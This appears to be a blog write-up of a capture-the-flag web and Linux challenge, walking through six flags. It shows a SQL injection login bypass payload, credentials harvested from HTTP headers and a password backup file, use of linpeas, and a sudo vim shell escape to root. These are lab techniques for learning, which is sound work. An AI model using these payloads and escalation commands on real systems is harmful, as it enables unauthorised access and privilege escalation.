Post

Web Linux Sig21CTF IIUM

Posted
By Abubakar Abubakar Yusif 2 min read

Web Linux Sig21CTF

Flag 1.

navigating to http://sig21ctf:3000 we got this login page. From the question hint, we knew that the backend database is mysql. The first thing i think of is SQL-Injection. using this payload I was able to bypass the login "OR 1=1--". Checking the http-headers we can get the flag
flag1: sig21CTF{wh0_s4id_1_need_passw0rd_t0_l0g1n}

Flag 2.

After a successfull login then we can see a command portal, seemingly for the admin to run some system commands,. executing ls -lah reveal the contents of the directory.

1
2
3
4
5
6
7
8
9
10
11
12

drwxr-xr-x  1 root root 4.0K Mar 30 11:37 .
drwxr-xr-x  1 root root 4.0K Mar 30 11:26 ..
-rw-r--r--  1 root root  612 Mar  3 15:34 dashboard.html
-rwxr-xr-x  1 root root 1.1K Mar 11 14:25 deploy.sh
-rw-r--r--  1 root root   38 Mar 30 11:35 flag2.txt
-rw-r--r--  1 root root  950 Mar  3 15:34 login.html
-rw-r--r--  1 root root 3.8K Mar 30 11:25 login.js
drwxr-xr-x 68 root root 4.0K Mar 30 11:34 node_modules
-rw-r--r--  1 root root  47K Mar  3 15:34 package-lock.json
-rw-r--r--  1 root root  359 Mar  3 15:34 package.json
drwxr-xr-x  2 root root 4.0K Mar  3 15:34 static
-rwxr-xr-x  1 root root  158 Mar 30 11:37 wrapper.sh

Now its clear that we need to read the file flag2.txt. I tried using cat but doesnt work. so i just tac instead
flag2: sig21CTF{n0t_0nl7_c4t_c4n_v13w_f1l3s}

Flag 3.

Login at http-header content from earliear, I noticed a ssh credentials sshuser:qP9jjbYeWzf7zs9t:2222 Using them will give us ssh access to the machine we simple got the flag at sshuser home
flag3: sig21CTF{1_though7_1t_w4s_s3cur3d_t0_st0r3_th3_55h_k3y5_h3r3}

Flag 4.

downloading linpeas.sh and running it we find the passwd.bak file easily
img
So now we have another user creds loggin as abu now we can see the flag at his homes directory

1
2
3
4

cat /opt/.passwd.bak
abu:WZd8gvSakFFUL8Me8gza
su abu && cd && cat flag_4.txt
flag4: sig21CTF{643628b8b7e514bb557211424e3796f4

Flag 5.

Running linpeas again as user abu, we figure out we actually can run /usr/bin/vim as root.
time to visit gtfobins
img

1
2
3

sudo vim -c ':!/bin/bash'
&& cd && cat flag_5.txt
flag5: sig21CTF{y0u_ju5t_g0tt4_l34rn_5tuff_0n_y0ur_0wn}

The above command will run vim in command mode and execute /bin/bash. since we run vim as root, we can still main our privileges.

Flag 6.

Checking the hint we can see that /etc was emphasize. So i just a simple grep command on /etc searching for anything with the flag format. and lucky enough we found something

1
2
3

grep -R sig21CTF{.*} /etc/ 2>/dev/null
/etc/ssh/sshd_config:# flag6: sig21CTF{52eaf68fadf470e9c993efb54a26ba35}

CONCLUTION

We started a simple sql injection and eventually we move to pwing the machine and becoming root. We utilize various mis-configurations on our way. Enumeration is the key, without it we cant find abu’s passwd nor seeing the mis-config on /usr/bin/vim . Finding that passwd was our first on becoming root.

Thanks and i hope this helps :)

sig21ctf-IIUM, Web-Linux
sqli priv-esc nodejs linux mis-config
This post is licensed under CC BY 4.0 by the author.